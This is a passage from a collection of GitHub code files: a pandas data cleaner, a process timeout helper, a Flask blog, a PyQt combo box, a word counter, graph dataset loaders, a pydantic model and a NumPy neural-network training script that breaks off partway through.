rocs\nLastEditTime: 2023-08-18 19:49:47\nDescription: clean the data of core indicators\n'''\nimport numpy as np\nimport pandas as pd\nimport sys\nsys.path.append(sys.path[0][:-17])\n\nfrom helper import presetting\nfrom helper import metricsPreset as mp\nfrom helper import helperFuncs as hf\nfrom dataCollection.rq1and2 import importProjectsList as pl \n\nPREFIX = presetting.PREFIX\n\n#read csv projects.csv\ndf_pl = pl.df\nprojectList = df_pl['ProjectName'].tolist()\nmetricTopics = mp.allMetrics\n\n\n\ndef dataClean(projectName, TQI3 = False):\n #read csv, if the metricTopic is in the subjMetrics list, then read the csv in the levels folder\n if (TQI3 == True):\n df = pd.read_csv(PREFIX + \"/docs/output/RQ2/uncleaned/\" + projectName + \"_3.csv\")\n else:\n df = pd.read_csv(PREFIX + \"/docs/output/RQ2/uncleaned/\" + projectName + \"_4.csv\") \n\n #change the 'Date' type from string to datetime\n df['Date'] = pd.to_datetime(df['Date'])\n #remove unnamed column\n df = df.loc[:, ~df.columns.str.contains('^Unnamed')]\n \n subMetricList = df.columns.tolist()\n subMetricList.pop(0)\n #change all other columns' type to string\n for m in subMetricList:\n df[m] = df[m].astype(str)\n \n #For these two metrics, we only need the values in right TQI Version\n if (TQI3 == False):\n #drop rows whose 'TQI Version' are 3.11\n df = df.drop(df[df['TQI Version'] == '3.11'].index)\n suffix = '4'\n else:\n #drop rows whose 'TQI Version' are 3.11\n df = df.drop(df[df['TQI Version'] != '3.11'].index)\n suffix = '3'\n \n\n #reset the index\n df_clear = df.reset_index(drop=True)\n\n\n #change all rows whose 'Value' contains 'ERROR' or '<>' to NaN\n for m in subMetricList:\n df_clear.loc[df_clear[m].str.contains('ERROR') == True, m] = '0'\n df_clear.loc[df_clear[m].str.contains('= 95]\n\n #some column values are '0', so we drop these rows,we use subMetricList to remove\n #remove 'TICS Version', 'TQI Version' from subMetricList\n subMetricList.remove('TQI Version')\n #remove all rows whose column values are string '0'\n df_clear = df_clear.drop(df_clear[(df_clear[subMetricList] == 0).all(axis=1)].index)\n\n\n #remove all rows which are completely same as its last row, keep the first one\n df_clear_dropSameValues = df_clear.drop_duplicates(subset=subMetricList, keep='first')\n df_clear_dropSameValues = df_clear_dropSameValues.reset_index(drop=True)\n\n #output the cleaned csv\n #if row number is less than 2, then we do not output the csv\n df_clear.to_csv(PREFIX + \"/docs/output/RQ2/cleaned/\" + projectName + '_' + suffix + \".csv\")\n df_clear_dropSameValues.to_csv(PREFIX + \"/docs/output/RQ2/cleaned/\" + projectName + \"_dropSameValues\"+ '_' + suffix + \".csv\")\n\n \n\n# projectList = ['ZigBee-Platform-EFR32-MG13']\n# metricTopics = ['AI']\n\nfor i in projectList:\n #if there is exception, then save the exception and continue\n # dataClean(i, TQI3 = False)\n try:\n dataClean(i, TQI3 = False)\n dataClean(i, TQI3 = True)\n except Exception as e:\n #save the error project name and metric name into a txt file\n with open(PREFIX + \"/docs/output/error/indiDataClean_\" + hf.getDatetime() + \".txt\", \"a\") as f:\n f.write(str(e) + \"\\n\" +\"Error in \" + i + \"!\" + \"\\n\\n\")\n continue\n\nprint(\"Data Clean Done!\")","repo_name":"rocsmytune/tiobe_projectCode","sub_path":"tiobe_main/dataAnalysis/rq2/indDataClean.py","file_name":"indDataClean.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73217898170","text":"from multiprocessing import Process, Pipe\n\n\nclass Timeout:\n def __init__(self, func, timeout):\n self.func = func\n self.timeout = timeout\n\n def __call__(self, *args, **kargs):\n def pmain(pipe, func, args, kargs):\n result = None\n\n try:\n result = func(*args, **kargs)\n except Exception:\n pass\n\n pipe.send(result)\n\n parent_pipe, child_pipe = Pipe()\n\n p = Process(target=pmain, args=(child_pipe, self.func, args, kargs))\n p.start()\n p.join(self.timeout)\n\n result = None\n\n if p.is_alive():\n p.terminate()\n result = None\n raise TimeoutError\n\n result = parent_pipe.recv()\n\n return result\n","repo_name":"chris-ritsen/network-audio-controller","sub_path":"netaudio/utils/timeout.py","file_name":"timeout.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"77"} +{"seq_id":"42165111819","text":"from flask import Flask, render_template\nimport requests\n\napp = Flask(__name__)\nblog_url = \"https://api.npoint.io/c790b4d5cab58020d391\"\n\n# Get the posts from the json/API\nresponse = requests.get(blog_url)\nall_posts = response.json()\n# all_posts = [post for post in posts_data]\nnumber_of_posts = len(all_posts)\n\n\n@app.route('/')\ndef home():\n return render_template(\"index.html\", posts=all_posts, total_posts=number_of_posts)\n\n\n@app.route('/post/')\ndef get_post(post_index):\n id = int(post_index)-1\n return render_template(\"post.html\", post=all_posts[id])\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"luanbartole/100-days-of-code-python","sub_path":"03_Intermediate+/Day 57 - Templating with Jinja in Flask Applications/057_blog-capstone-1.py","file_name":"057_blog-capstone-1.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40427748419","text":"from PyQt4 import QtCore, QtGui\n\nfrom library.crbcombobox import CRBComboBox\nfrom library.TableModel import CTableModel, CTextCol, CRefBookCol\nfrom library.Utils import forceRef, forceStringEx, toVariant\n\nfrom Ui_FormularyComboBoxPopup import Ui_FormularyComboBoxPopup\n\n\nclass CFormularyComboBox(CRBComboBox):\n def __init__(self, parent, filter = None):\n CRBComboBox.__init__(self, parent)\n self.setTable('vrbDrugFormulary_Item')\n self._filter = filter\n self._popup = None\n\n def setQValue(self, var):\n self.setValue(forceRef(var))\n\n def showPopup(self):\n if not self._popup:\n self._popup = CFormularyComboBoxPopup(self, self._filter)\n self.connect(self._popup,QtCore.SIGNAL('itemSelected(QVariant)'), self.setQValue)\n #self._popup.setDefaults(self.defaultClass, self.defaultType)\n pos = self.rect().bottomLeft()\n pos = self.mapToGlobal(pos)\n size = self._popup.sizeHint()\n width= max(size.width(), self.width())\n size.setWidth(width)\n screen = QtGui.QApplication.desktop().availableGeometry(pos)\n pos.setX( max(min(pos.x(), screen.right()-size.width()), screen.left()) )\n pos.setY( max(min(pos.y(), screen.bottom()-size.height()), screen.top()) )\n self._popup.move(pos)\n self._popup.resize(size)\n self._popup.show()\n\nclass CFormularyComboBoxPopup(QtGui.QFrame, Ui_FormularyComboBoxPopup):\n __pyqtSignals__ = ('itemSelected(int)',\n )\n\n def __init__(self, parent=None, filter=None):\n QtGui.QFrame.__init__(self, parent, QtCore.Qt.Popup)\n self._parent = parent\n self._filter = filter\n self.setupUi(self)\n self.model = CFormularyModel(self)\n self.tblFormulary.setModel(self.model)\n self.tblFormulary.setSelectionMode(QtGui.QAbstractItemView.SingleSelection)\n\n self.initSearch()\n\n def show(self):\n self.resetSearch()\n self.applySearch()\n self.tblFormulary.setFocus()\n id = self._parent.value()\n if id:\n self.tblFormulary.setCurrentItemId(self._parent.value())\n else:\n self.tblFormulary.setCurrentRow(0)\n QtGui.QFrame.show(self)\n\n def selectCurrentItem(self):\n id = self.tblFormulary.currentItemId()\n self.emit(QtCore.SIGNAL('itemSelected(QVariant)'), toVariant(id))\n self.hide()\n\n def initSearch(self):\n self._code = ''\n self._name = ''\n self._tradeName = ''\n self._mnn = ''\n\n def resetSearch(self):\n self.initSearch()\n self.edtCode.setText(self._code)\n self.edtName.setText(self._name)\n self.edtTradeName.setText(self._tradeName)\n self.edtMnn.setText(self._mnn)\n\n def applySearch(self):\n self._code = forceStringEx(self.edtCode.text())\n self._name = forceStringEx(self.edtName.text())\n self._tradeName = forceStringEx(self.edtTradeName.text())\n self._mnn = forceStringEx(self.edtMnn.text())\n\n db = QtGui.qApp.db\n cond = []\n tableFormulary = db.table('vrbDrugFormulary_Item')\n table = tableFormulary\n\n if self._code:\n cond.append(tableFormulary['code'].like(self._code))\n if self._name:\n cond.append(tableFormulary['name'].like('%' + self._name + '%'))\n if self._tradeName:\n cond.append(tableFormulary['tradeName'].like('%' + self._tradeName + '%'))\n if self._mnn:\n cond.append(tableFormulary['mnn'].like('%' + self._mnn + '%'))\n if self._filter and len(self._filter) > 0:\n cond.append(self._filter)\n tableTarget = tableFormulary\n idList = db.getIdList(table, tableTarget['id'].name(), cond, [tableTarget['name'].name(), tableTarget['code'].name()] )\n self.tblFormulary.setIdList(idList)\n\n @QtCore.pyqtSlot(QtCore.QModelIndex)\n def on_tblFormulary_clicked(self, index):\n self.selectCurrentItem()\n\n @QtCore.pyqtSlot(QtGui.QAbstractButton)\n def on_buttonBox_clicked(self, button):\n buttonCode = self.buttonBox.standardButton(button)\n if buttonCode == QtGui.QDialogButtonBox.Apply:\n self.applySearch()\n self.tabWidget.setCurrentIndex(0)\n elif buttonCode == QtGui.QDialogButtonBox.Reset:\n self.resetSearch()\n\n def keyPressEvent(self, event):\n if event.key() in (QtCore.Qt.Key_Return, QtCore.Qt.Key_Enter):\n if self.tabWidget.currentIndex():\n self.applySearch()\n self.tabWidget.setCurrentIndex(0)\n else:\n if self.tblFormulary.currentItemId():\n self.selectCurrentItem()\n QtGui.QFrame.keyPressEvent(self, event)\n\n\nclass CFormularyModel(CTableModel):\n def __init__(self, parent):\n CTableModel.__init__(self, parent, [\n CTextCol( u'Код', ['code'], 20),\n CTextCol( u'Формулярное наименование', ['name'], 60),\n CRefBookCol( u'Торговое наименование', ['tradeName_id'], 'dlo_rbTradeName', 60)\n ], 'vrbDrugFormulary_Item' )\n","repo_name":"dio4/vista_1","sub_path":"library/FormularyComboBox.py","file_name":"FormularyComboBox.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38236100443","text":"#!/usr/bin/python3\r\n# CYB333: Final Course Project\r\n#Project Title: Word Frequency \r\n#Author: CMDCMstr3\r\n#Date: June 22, 20121\r\n\r\n\r\nimport string\r\n# Opens and reads text file.\r\ntext = open(\"PythonMission.txt\", \"r\") \r\n# This will create the dictionary that will be used.\r\nd = dict() \r\n# This creates a loop through PythonMission.txt\r\nfor line in text:\r\n# Changes all words in text to lower case.\t\r\n\tline = line.lower()\r\n# Removes all punctualation. Note: It took me a while to figure this out.\t\r\n\tline = line.translate(line.maketrans(\"\", \"\", string.punctuation))\r\n\t\r\n\twords = line.split(\" \")\r\n# starts an iteration through each word.\r\nfor word in words:\r\n\t\r\n\tif word in d:\r\n# Counts each word by one incrementally.\t\t\r\n\t\td[word] = d[word] + 1\r\n\t\r\n\telse:\r\n# Those words that appear once is assigned a 1. \t\r\n\t\td[word] = 1\r\n# Printing format for words in the dictionary.\r\nfor key in list(d.keys()):\r\n\t\r\n\tprint(key + \": \", d[key], ', ', sep='', end='')\r\n\t\r\n\t \r\n\r\n","repo_name":"CMDCMstr3/CYB333-Word-Freq-Project","sub_path":"CMDCMstr3 Word Freq Project.py","file_name":"CMDCMstr3 Word Freq Project.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13513410647","text":"import numpy as np\nimport scipy.sparse as sp\nimport torch as th\nfrom sklearn.preprocessing import OneHotEncoder\n \ndef encode_onehot(labels):\n labels = labels.reshape(-1, 1)\n enc = OneHotEncoder()\n enc.fit(labels)\n labels_onehot = enc.transform(labels).toarray()\n return labels_onehot\n\ndef preprocess_features(features):\n \"\"\"Row-normalize feature matrix and convert to tuple representation\"\"\"\n rowsum = np.array(features.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n features = r_mat_inv.dot(features)\n return features.todense()\n\ndef get_pos(pos):\n row = pos.row\n col = pos.col\n p = []\n flag = 0\n temp = []\n for i,j in zip(row,col):\n if flag!=i:\n temp = th.stack(temp)\n p.append(temp)\n temp = []\n flag = flag + 1\n temp.append(th.tensor(j).long())\n p.append(th.stack(temp))\n return p\n\ndef normalize_adj(adj):\n \"\"\"Symmetrically normalize adjacency matrix.\"\"\"\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n\n\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\n \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\n sparse_mx = sparse_mx.tocoo().astype(np.float32)\n indices = th.from_numpy(\n np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\n values = th.from_numpy(sparse_mx.data)\n shape = th.Size(sparse_mx.shape)\n return th.sparse.FloatTensor(indices, values, shape)\n\n\ndef load_acm(ratio, type_num):\n # The order of node types: 0 p 1 a 2 s\n # 4019 7167 60\n path = \"../data/acm/\"\n label = np.load(path + \"labels.npy\").astype('int32')\n label = encode_onehot(label)\n \n nei_a = sp.load_npz(path + \"nei_a.npz\")\n nei_s = sp.load_npz(path + \"nei_s.npz\")\n feat_p = sp.load_npz(path + \"p_feat.npz\")\n feat_a = sp.load_npz(path + \"a_feat.npz\")\n feat_s = sp.eye(type_num[2])\n pap = sp.load_npz(path + \"pap.npz\")\n psp = sp.load_npz(path + \"psp.npz\")\n train = [np.load(path + \"train_\" + str(i) + \".npy\") for i in ratio]\n test = [np.load(path + \"test_\" + str(i) + \".npy\") for i in ratio]\n val = [np.load(path + \"val_\" + str(i) + \".npy\") for i in ratio]\n\n label = th.FloatTensor(label)\n nei_a = sparse_mx_to_torch_sparse_tensor(nei_a)\n nei_s = sparse_mx_to_torch_sparse_tensor(nei_s)\n feat_p = th.FloatTensor(preprocess_features(feat_p))\n feat_a = th.FloatTensor(preprocess_features(feat_a))\n feat_s = th.FloatTensor(preprocess_features(feat_s))\n # pap pap type = \n\n #pap = sparse_mx_to_torch_sparse_tensor(normalize_adj(pap))\n #psp = sparse_mx_to_torch_sparse_tensor(normalize_adj(psp))\n train = [th.LongTensor(i) for i in train]\n val = [th.LongTensor(i) for i in val]\n test = [th.LongTensor(i) for i in test]\n\n # print(feat_p.size())\n # print(feat_p)\n return [nei_a, nei_s], [feat_p, feat_a, feat_s], [pap, psp], label, train, val, test\n\n\ndef load_dblp(ratio, type_num):\n path = \"../data/dblp/\"\n label = np.load(path + \"labels.npy\").astype('int32')\n label = encode_onehot(label)\n feat_a = sp.load_npz(path + \"a_feat.npz\").astype(\"float32\")\n feat_p = sp.load_npz(path + \"p_feat.npz\").astype(\"float32\")\n feat_c = sp.eye(type_num[3])\n feat_t = np.load(path+\"t_feat.npz\")\n\n nei_ap = sp.load_npz(path + \"nei_ap.npz\")\n nei_apc = sp.load_npz(path + \"nei_apc.npz\")\n nei_apcp = sp.load_npz(path + \"nei_apcp.npz\")\n nei_apt = sp.load_npz(path + \"nei_apt.npz\")\n nei_aptp = sp.load_npz(path + \"nei_aptp.npz\")\n\n apa = sp.load_npz(path + \"apa.npz\") \n apcpa = sp.load_npz(path + \"apcpa.npz\")\n aptpa = sp.load_npz(path + \"aptpa.npz\") \n\n train = [np.load(path + \"train_\" + str(i) + \".npy\") for i in ratio]\n test = [np.load(path + \"test_\" + str(i) + \".npy\") for i in ratio]\n val = [np.load(path + \"val_\" + str(i) + \".npy\") for i in ratio]\n \n label = th.FloatTensor(label)\n\n nei_ap = sparse_mx_to_torch_sparse_tensor(nei_ap)\n nei_apc = sparse_mx_to_torch_sparse_tensor(nei_apc)\n nei_apcp = sparse_mx_to_torch_sparse_tensor(nei_apcp)\n nei_apt = sparse_mx_to_torch_sparse_tensor(nei_apt)\n nei_aptp = sparse_mx_to_torch_sparse_tensor(nei_aptp)\n \n feat_p = th.FloatTensor(preprocess_features(feat_p))\n feat_a = th.FloatTensor(preprocess_features(feat_a))\n feat_t = th.FloatTensor(feat_t)\n feat_c = th.FloatTensor(preprocess_features(feat_c))\n\n train = [th.LongTensor(i) for i in train]\n val = [th.LongTensor(i) for i in val]\n test = [th.LongTensor(i) for i in test]\n\n return [nei_ap, nei_apc, nei_apcp, nei_apt, nei_aptp], [feat_a, feat_p, feat_t, feat_c], [apa, apcpa, aptpa], label, train, val, test\n\n\ndef load_aminer(ratio, type_num):\n path = \"../data/aminer/\"\n label = np.load(path + \"labels.npy\").astype('int32')\n label = encode_onehot(label)\n nei_a = sp.load_npz(path + \"nei_a.npz\")\n nei_r = sp.load_npz(path+ \"nei_r.npz\")\n\n feat_p_pap = np.load(path + \"feat_p_pap.w1000.l100.npy\").astype('float')\n feat_p_prp = np.load(path + \"feat_p_prp.w1000.l100.npy\").astype('float')\n feat_a = np.load(path + \"feat_a.w1000.l100.npy\").astype('float')\n feat_r = np.load(path + \"feat_r.w1000.l100.npy\").astype('float')\n\n feat_p = th.stack((th.FloatTensor(feat_p_pap),th.FloatTensor(feat_p_prp)))\n feat_a = th.FloatTensor(feat_a)\n feat_r = th.FloatTensor(feat_r)\n\n\n # feat_p = feat_p.mean(axis=0)\n # feat_p = sp.eye(type_num[0])\n # feat_a = sp.eye(type_num[1])\n # feat_r = sp.eye(type_num[2])\n # feat_p = th.FloatTensor(preprocess_features(feat_p))\n # feat_a = th.FloatTensor(preprocess_features(feat_a))\n # feat_r = th.FloatTensor(preprocess_features(feat_r))\n\n\n pap = sp.load_npz(path + \"pap.npz\")\n prp = sp.load_npz(path + \"prp.npz\")\n train = [np.load(path + \"train_\" + str(i) + \".npy\") for i in ratio]\n test = [np.load(path + \"test_\" + str(i) + \".npy\") for i in ratio]\n val = [np.load(path + \"val_\" + str(i) + \".npy\") for i in ratio]\n\n label = th.FloatTensor(label)\n nei_a = sparse_mx_to_torch_sparse_tensor(nei_a)\n nei_r = sparse_mx_to_torch_sparse_tensor(nei_r)\n\n train = [th.LongTensor(i) for i in train]\n val = [th.LongTensor(i) for i in val]\n test = [th.LongTensor(i) for i in test]\n return [nei_a, nei_r], [feat_p, feat_a, feat_r], [pap, prp], label, train, val, test\n\n\ndef load_imdb(ratio, type_num):\n # m a d k\n # 4275 5432 2083 7313\n path = \"../data/imdb/\" \n label = np.load(path + \"labels.npy\").astype('int32')\n label = encode_onehot(label)\n label = th.FloatTensor(label)\n\n feat_m = sp.load_npz(path + \"m_feat.npz\").astype(\"float32\")\n feat_a = sp.eye(type_num[1])\n feat_d = sp.eye(type_num[2])\n feat_k = sp.eye(type_num[3])\n\n nei_a = sp.load_npz(path + \"nei_a.npz\")\n nei_d = sp.load_npz(path + \"nei_d.npz\")\n nei_k = sp.load_npz(path + \"nei_k.npz\")\n nei_a = sparse_mx_to_torch_sparse_tensor(nei_a)\n nei_d = sparse_mx_to_torch_sparse_tensor(nei_d)\n nei_k = sparse_mx_to_torch_sparse_tensor(nei_k)\n\n mam = sp.load_npz(path + 'mam.npz')\n mdm = sp.load_npz(path + 'mdm.npz')\n mkm = sp.load_npz(path + 'mkm.npz')\n\n\n train = [np.load(path + \"train_\" + str(i) + \".npy\") for i in ratio]\n test = [np.load(path + \"test_\" + str(i) + \".npy\") for i in ratio]\n val = [np.load(path + \"val_\" + str(i) + \".npy\") for i in ratio]\n\n feat_m = th.FloatTensor(preprocess_features(feat_m))\n feat_a = th.FloatTensor(preprocess_features(feat_a))\n feat_d = th.FloatTensor(preprocess_features(feat_d))\n feat_k = th.FloatTensor(preprocess_features(feat_k))\n\n train = [th.LongTensor(i) for i in train]\n val = [th.LongTensor(i) for i in val]\n test = [th.LongTensor(i) for i in test]\n return [nei_a, nei_d, nei_k], [feat_m, feat_a, feat_d, feat_k], [mam, mdm, mkm], label, train, val, test\n\n\ndef load_data(dataset, ratio, type_num):\n if dataset == \"acm\":\n data = load_acm(ratio, type_num)\n elif dataset == \"dblp\":\n data = load_dblp(ratio, type_num)\n elif dataset == \"aminer\":\n data = load_aminer(ratio, type_num)\n elif dataset == 'imdb':\n data = load_imdb(ratio, type_num)\n return data\n","repo_name":"jianxiangyu/MEOW","sub_path":"code_adameow/utils/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":8432,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"26332753666","text":"from pydantic import BaseModel, Field, ValidationInfo, field_validator\nfrom models.base.enums import Language, OperatingSystems\nfrom utils import regex\n\n\nclass UserUpdateRequest(BaseModel):\n first_name: str = Field(default=None, pattern=regex.NAME)\n last_name: str = Field(default=None, pattern=regex.NAME)\n email: str = Field(default=None, pattern=regex.EMAIL)\n mobile: str = Field(default=None, pattern=regex.MSISDN)\n profile_pic_url: str = Field(default=None, pattern=regex.URL)\n firebase_token: str | None = None\n os: OperatingSystems | None = None\n language: Language | None = None\n\n model_config = {\n \"json_schema_extra\": {\n \"examples\": [\n {\n \"first_name\": \"John\",\n \"last_name\": \"Doo\",\n \"mobile\": \"7999228903\",\n \"email\": \"myname@gmail.com\",\n \"profile_pic_url\": \"https://pics.com/myname.png\",\n \"language\": \"en\",\n \"os\": \"ios\",\n \"firebase_token\": \"long_string\"\n }\n ]\n }\n }\n","repo_name":"edraj/middleware_skeleton","sub_path":"api/user/Requests/user_update_request.py","file_name":"user_update_request.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26688129572","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 11 17:36:44 2020\n\n@author: manpreetsi\n\"\"\"\n\n\n### 4th End to End DNN Code using NumPy only ####\n\n### This code has additional features & Hyperparameters of DNN namely:-\n# Dropout\n# Normalizing/Scaling Inputs\n# Initializaing weights with better condition\n# GDM ( Gradient Descent Momentum)\n# Mini- Batch\n\n\n# Train-Test Split\n# Check model performance using AUC (Area under the curve)\n# Generalised the network - user input to create layers number and neurons per layer in the network\n# Load file from your storage (csv or excel) and run the DNN on it !\n\n'''\nA network with following description:-\n20 ------> 40 ------> 80 -------> 10 -------> 1\ninput_layer Hiddent_Layer_1 Hiddent_Layer_2 Hiddent_Layer_3 Output Layer\nx w1,b1 w2,b2 w3,b3 w4,b4 y\n\nhidden layer functions are RelU\nFinal layer function is sigmoid\n\n'''\n\nimport numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nfrom datetime import datetime\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import accuracy_score\n\nprint(\"Enter all the parameters/values one-one by as aksed to build your customized Deep Neural Network !\")\nlearning_rate = float(input(\"Enter the learning rate\"))\nbeta1 = float(input(\"Emter beta1 value\"))\ntest_percentage = int(input(\"Percentage of test data, type numeric value only\"))\nbatch_size = int(input(\"Enter the batch size\\n\"))\nnetwork_size = int(input(\"Input the size of the network you want to create, excluding the input(A0) layer and output layer: \\n\"))\n \n### load file to get input features and y_true ( Diabetic prediction)\ndata=pd.read_csv(\"diabetes.csv\")\n \ny=data.loc[:,data.columns == \"Outcome\"]\nx=data.loc[:,data.columns != \"Outcome\"]\nlayer_nn,mini_batches = [],[]\n\nlayer_nn, mini_batches,cost_array, param, Z_all, A_all, dZ_all, Vdw,Vdb,nw_size,x_train,x_test,y_train,y_test = dnn_preprocessing(x,y,test_percentage,batch_size,network_size )\n\n### Run the DNN\nprint(\"Network Modeling started at \", datetime.now())\ncost_array,Z_all,A_all,dZ_all,Vdw,Vdb, param,alpha = run_nn_epochs(Z_all, A_all,param,cost_array,dZ_all,Vdw,Vdb,nw_size,layer_nn,learning_rate,mini_batches)\n\n### run the NN for Validation data (to predict and check) and check it's AUC\nauc_nn,Z_test_all,A_test_all = model_validation(param,x_test,y_test,nw_size)\nprint(\"DNN auc value is : \", auc_nn) ## .838\n\n### Cost Graph Function\ncost_array = cost_graph(cost_array)\nprint(\"Network Modeling completed at \", datetime.now(), \"minimum cost function value of \",min(cost_array))\n\n\ndef dnn_preprocessing(x,y,test_percentage,batch_size,network_size):\n \n layer_nn = []\n mini_batches =[]\n \n ### DF to NumPy & transposing the array because train_test_split takes columns are features and not rows & scsling the x's !\n x= x.to_numpy()\n y= y.to_numpy()\n \n x = preprocessing.scale(x)\n \n ### Creating the DNN Architecture\n layer_nn = nn_arch(int(x.shape[1]),network_size)\n \n nw_size = len(layer_nn)\n \n ## Splitting the train and test data\n x_train,x_test,y_train,y_test = splitting_train_test(x,y,test_percentage)\n \n ## Variable intialization\n cost_array, param, Z_all, A_all, dZ_all, Vdw,Vdb = var_init(layer_nn)\n \n ### Mini-Btches creation\n mini_batches = create_mini_batch(x_train,y_train,batch_size)\n \n len(mini_batches)\n \n return layer_nn, mini_batches,cost_array, param, Z_all, A_all, dZ_all, Vdw,Vdb,nw_size,x_train,x_test,y_train,y_test \n\ndef nn_arch(input_layer_size,network_size):\n l1= input_layer_size\n ## feeding the input layer neurons !\n layer_nn.append(int(x.shape[1]))\n \n for i in range(0,network_size):\n print(\"Enter number of neurons for hidden layer\", i+1 ,\":\") \n item = int(input())\n layer_nn.append(item)\n \n ## feeding the output layer neuron !\n layer_nn.append(int(1))\n print(\"Your network has \", len(layer_nn)-2,\" and 2 layers of input and output each.\\n\")\n \n return layer_nn\n\ndef splitting_train_test(x,y,test_percentage):\n \n test_ratio = test_percentage/100\n \n ##### Train - Test Split\n x_train,x_test,y_train,y_test = train_test_split(x,y,test_size=test_ratio, stratify = y)\n\n ### Transposing again to make it fit for the NN design\n x_train = x_train.T\n x_test = x_test.T\n y_train = y_train.T\n y_test = y_test.T\n \n return x_train,x_test,y_train,y_test\n\ndef create_mini_batch(x_train,y_train,batch_size):\n ## create mini bacthes creation begins\n mini_batch_size = batch_size\n mini_batches = []\n u = x_train.shape[1]\n \n perm = list(np.random.permutation(u))\n shuffled_x = x_train[:,perm]\n shuffled_y = y_train[:,perm]\n \n num_min_batches = math.floor(u/mini_batch_size)\n \n for k in range(0,num_min_batches):\n mini_batch_x = shuffled_x[:,k*mini_batch_size:(k+1)*mini_batch_size]\n mini_batch_y = shuffled_y[:, k*mini_batch_size:(k+1)*mini_batch_size]\n \n mini_batch=(mini_batch_x, mini_batch_y)\n mini_batches.append(mini_batch)\n \n ## handling the remaning datapoints\n if u % mini_batch_size != 0:\n mini_batch_x = shuffled_x[:, num_min_batches*mini_batch_size: ]\n mini_batch_y = shuffled_y[:, num_min_batches*mini_batch_size: ]\n mini_batch = (mini_batch_x, mini_batch_y)\n mini_batches.append(mini_batch)\n return mini_batches\n\ndef run_nn_epochs(Z_all, A_all,param,cost_array,dZ_all,Vdw,Vdb,nw_size,layer_nn,learning_rate, mini_batches):\n num_batches = len(mini_batches)\n alpha = learning_rate\n \n for epoch in range(1,1001):\n cost = 0 \n for num in range(0,num_batches):\n \n x_min = mini_batches[num][0] \n y_min = mini_batches[num][1] \n \n Z_all, A_all = forward_prop(param,x_min,y_min,nw_size)\n A_all['A'+str(0)]=x_min\n \n temp = comp_cost(A_all,y_min,nw_size)\n cost += temp\n \n dZ_all,Vdw,Vdb = backward_prop(layer_nn,A_all,y_min,param,Z_all,beta1)\n \n param = param_update(Vdw,Vdb,param,alpha,nw_size)\n \n \n cost = cost/num_batches \n cost_array.append(cost)\n \n #alpha0 = (1/(1 + (decay_rate*epoch)))*alpha\n #alpha = alpha0\n \n \n return (cost_array,Z_all,A_all,dZ_all,Vdw,Vdb, param,alpha) \n\ndef model_validation(param,x_test,y_test,nw_size):\n \n Z_test_All, A_test_all = {},{}\n Z_test_all, A_test_all = forward_prop_test(param,x_test,y_test,nw_size)\n y_test_hat = A_test_all['A'+str(nw_size-1)]\n auc_nn = round(roc_auc_score(np.squeeze(y_test),np.squeeze(y_test_hat)),3)\n return auc_nn,Z_test_all,A_test_all\n\ndef cost_graph(cost_array):\n \n cost_array= np.array(cost_array)\n cost_array = cost_array[np.isfinite(cost_array)]\n xs = np.arange(1,len(cost_array)+1)\n \n ### Cost Graph #### \n plt.plot(xs,cost_array)\n plt.xlabel('iterations')\n plt.ylabel('Cost Function')\n plt.show()\n print(\"################################# Cost Graph has been plotted ! ################################# \")\n return cost_array\n\ndef param_init(layers_nn):\n\n np.random.seed(1)\n param={}\n size_nn = len(layer_nn)\n for i in range(1,size_nn):\n param['W' + str(i)] = np.random.random((layer_nn[i], layer_nn[i-1])) * np.sqrt(2/layer_nn[i-1]) ## initializing appropriate weights \n param['b' + str(i)] = np.zeros((layer_nn[i],1))\n \n ### Checker to check the dimensions of weights w & bias b ###\n assert(param['W'+str(i)].shape == (layer_nn[i], layer_nn[i-1]))\n assert(param['b'+str(i)].shape == (layer_nn[i],1))\n \n return param\n\ndef var_init(layer_nn):\n \n cost_array = []\n \n param={}\n param = param_init(layer_nn)\n \n Z_all, A_all = {},{}\n dZ_all,Vdw, Vdb = {},{},{}\n return cost_array, param, Z_all, A_all, dZ_all, Vdw,Vdb\n\ndef relu(x):\n return (x>0) * x\n \ndef sigmoid(x):\n sig= 1/(1+ np.exp(-x))\n return sig \n\ndef relu_deriv(x):\n print(x)\n return x>0\n \ndef forward_prop(param,x,y,size_nn):\n\n A = x\n A_prev = A \n A_all ={}\n Z_all = {} \n \n for i in range (1,size_nn-1):\n W = param['W'+str(i)]\n A_prev = A\n b = param['b' + str(i)]\n \n Z = np.dot(W,A_prev) + b \n A = relu(Z)\n \n ### Implemented Dropout with 70% probability\n dropout_mask = np.random.rand(A.shape[0],A.shape[1]) < .7 ## 30% neurons will be switched off \n A *= dropout_mask\n \n Z_all['Z' + str(i)] = Z\n A_all['A' + str(i)] = 